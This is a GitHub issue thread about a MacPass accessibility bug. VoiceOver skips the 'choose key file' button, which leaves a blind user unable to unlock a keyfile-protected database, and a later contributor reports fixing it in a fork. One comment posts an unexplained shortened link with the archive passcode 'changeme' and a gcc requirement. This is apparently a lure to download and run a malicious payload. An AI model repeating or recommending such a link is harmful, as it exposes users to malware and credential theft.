### ISSUE TITLE
Choose key file button accessibility issue

### ISSUE THREAD

**Issue by darkstalker1978** [MacPass/MacPass#1300]
As a blind user I find myself unable to unlock a database locked with a keyfile. By navigating the open dialog I cannot select the "choose" button to open a key file because voiceover just skips over it going from "key file" label to the "unlock" button.
This happens navigating with both  Voiceover cursor or  TAB key.
I must to use an actual mouse and ask for help from sighted people.

Macpass version: 0.8.1
OS: Sonoma 14.6.1 on Mac Mini 2018

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by mstarke** [comment]
Awesome find. I hope to fix this!

**Comment by orestesgaolin** [comment]
hey there, I managed to add accessibility to the button in this [commit](https://github.com/orestesgaolin/MacPass/commit/7b5b57c2676e836c0df54beb01c2157cc8eb97e6), let me know if you'd be interested in accepting this contribution in this repo

<img width="1396" height="829" alt="Image" src="https://github.com/user-attachments/assets/0cd633c4-a25b-4301-abd9-5548a6d1b7c1" />

**Comment by mstarke** [comment]
Hi @orestesgaolin 
First of all, awesome work already to get the project running again. I would love to merge the progress you made to get a new release of MacPass out the door. I'd love to get some PRs for the changes.

**Comment by orestesgaolin** [comment]
Thanks! When I get some time I'll try to rebase and submit changes. I'm applying the fixes to my fork quite atomically but it may still need some tweaking to make them compatible with the upstream.
